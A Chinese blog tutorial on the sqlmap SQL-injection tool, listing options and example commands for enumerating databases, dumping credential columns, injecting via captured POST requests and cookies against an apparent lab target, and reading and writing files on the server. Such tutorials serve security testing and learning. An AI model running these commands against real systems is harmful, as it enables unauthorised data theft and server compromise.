博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
sqlmap的简单使用方法
阅读量:3960 次
发布时间:2019-05-24

本文共 2321 字,大约阅读时间需要 7 分钟。

介绍

sqlmap是安全测试工具,通常用于对已知的http接口进行sql注入测试,一旦注入成功,可以获取到后台包括数据库表、用户信息、数据内容等多种敏感信息,对web漏洞防范有重要意义。

使用

--is-dba 当前用户权限(是否为root权限,mssql下最高权限为sa)--dbs 所有数据库--current-db 网站当前数据库--users 所有数据库用户--current-user 当前数据库用户--random-agent 构造随机user-agent--passwords 数据库密码--proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理--time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒--threads=                       使用多少线程

注入点探测:

python sqlmap.py -u [url]
比如查看有哪些数据库:

简单使用

python sqlmap.py –u http://localhost:8080/login --data=’username=zhangsan&password=12345’ --dbs

查看当前数据库:

python sqlmap.py –u http://localhost:8080/login --data=’username=zhangsan&password=12345’ --current-db

查看当前用户:

python sqlmap.py –u http://localhost:8080/login --data=’username=zhangsan&password=12345’ --current-user

查看数据库中有哪些表:

python sqlmap.py –u http://localhost:8080/login --data=’username=zhangsan&password=12345’ -D dbname --table

查看表中有哪些字段:

python sqlmap.py –u http://localhost:8080/login --data=’username=zhangsan&password=12345’ -D dbname -T users --column

查看字段内容:

python sqlmap.py –u http://localhost:8080/login --data=’username=zhangsan&password=12345’ -D dbname -T users -C “username,password,usertype” --dump

利用sqlmap进行POST注入

先利用bp去抓一个包,直接发送包里面的内容保存到一个文件里面,然后用-r参数去实现它就好

例如
sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql 指定username参数,-dbms指定了某种数据库,这句话指定的是mysql数据库,-p指定的是参数,不指定的话每一个参数他都会尝试
注意这句话已经不像平常那样需要-u参数了,直接-r参数即可,因为报文里面已经含有了含有应有的各种条件
利用sqlmap进行需要登陆的注入

可以跟上面进行post注入的一样,直接-r参数带上你的抓包文件路径,既然是需要登录的注入,那么报文里面肯定是要有cookie的

利用–cookie参数注入

例如:

sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1& Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” --current-db

在服务器端读写入文件

输入:

sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” --file-write C:\1.txt --file-dest /opt/lampp/htdocs/vulnerabilities/exec/1.txt

sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” --file-read=文件的绝对路径

宽字节注入

sqlmap.py -u “url” --batch -v 3 --tamper “unmagicquotes.py” --dbs

–tamper 指定脚本文件,可在sqlmap安装目录查看支持的脚本,或者自定义修改,结合–batch -v 3使用时效果最佳
参考文章 :
https://blog.csdn.net/zjc/article/details/90260373
https://www.toobug.cn/post/256.html
https://blog.csdn.net/u011377996/article/details/81368482

你可能感兴趣的文章
采用动态代理对事务进行封装
查看>>
采用ThreadLocal维护Connection
查看>>
测试JSTL表达式
查看>>
一口一口吃掉Struts(六)——动态ActionForm
查看>>
一口一口吃掉struts(七)——ActionForward知多少
查看>>
浅析Hibernate映射(二)——关系映射(3)
查看>>
浅析Hibernate映射(四)——组件映射(component)
查看>>
Hibernate性能优化
查看>>
Spring核心ioc
查看>>
SSH框架总结(框架分析+环境搭建+实例源码下载)
查看>>
Struts2+Spring3+Mybatis3开发环境搭建
查看>>
mongoDB入门必读(概念与实战并重)
查看>>
通俗易懂解剖jbpm4
查看>>
云盘 同步盘介绍 同步工具介绍
查看>>
rsync
查看>>
win7 英文版电脑 不睡眠,不休眠
查看>>
Bash中如何判断一个命令是否存在 查看当前目录下文件的个数
查看>>
makefile
查看>>
linux 文件权限
查看>>
部分简化字感觉不如繁体字有深意
查看>>